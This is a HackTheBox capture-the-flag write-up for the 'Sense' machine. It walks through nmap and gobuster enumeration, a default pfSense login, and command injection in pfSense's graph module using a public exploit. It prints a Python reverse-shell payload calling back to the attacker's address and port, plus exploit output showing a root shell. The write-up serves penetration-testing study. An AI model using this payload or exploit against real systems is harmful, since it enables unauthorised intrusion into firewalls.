Sense

tags: HTB Easy FreeBSD OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: FreeBSD

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:17 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 91.70 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 80,443 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:19 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.093s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/http lighttpd 1.4.35
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: lighttpd/1.4.35
|_http-title: 501
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Comau embedded (92%)
Aggressive OS guesses: Comau C4G robot control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   93.34 ms 10.10.14.1
2   93.34 ms sense.htb (10.10.10.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds

Accessing to the webserver we can find a pfSense installation running.

Gobuster

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60/ -x php,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2021/03/21 21:04:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2021/03/21 22:50:55 Finished
===============================================================

Well, inside system-users.txt we can find a username and a hint for the password.

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

Testing with the user rohit and the default password pfsense we managed to access the panel.

Exploitation

Well, looking a bit on the internet, I have seen that the graph module has a vulnerability with which we can perform code injection. Also, I found this page where a Python exploit is available.

In the exploit, originally you have to modify the lines 27, 28, 29, 30 and 31.

username =      "admin"
password =      "pfsense"
listener_ip =   "10.0.0.1"
listener_port = "4444"
target_ip = "10.0.0.2"

But in my case, the payload with nc did not work for me and withmsf it established a connection but it was lost instantly so, I have modified the nc payload so that it executes a reverse shell inPython, escaping the quotes properly.

# php/reverse_php
php_reverse_shell = """
exec('python -c \\\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8787));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\\\'');
"""

Now, we only have to put a terminal to listen and run the exploit!

# python3 pfSenseRCI.py nc
[*] setting payload to nc reverse shell (catch with 'nc -lvp PORT')
[*] exploiting pfsense_graph_injection_exec
[*] generating obfuscated/encoded reverse shell payload for 10.10.14.5:8787
    [+] generated obfuscated/encoded payload
[+] authenticating to firewall with (rohit:pfsense)
    [+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
    [+] authentication successful!
    [+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[*] octal encoding payload
    [+] encoding complete

[*] injecting into https://10.10.10.60/status_rrd_graph_img.php
    [+] exploit code injected successfully
[*] triggering the exploit (make sure to catch on 10.10.14.5:8787)

And enjoy being root!!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 23408
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /home/rohit/user.txt
CENSORED_FLAG 
# cat /root/root.txt
CENSORED_FLAG
#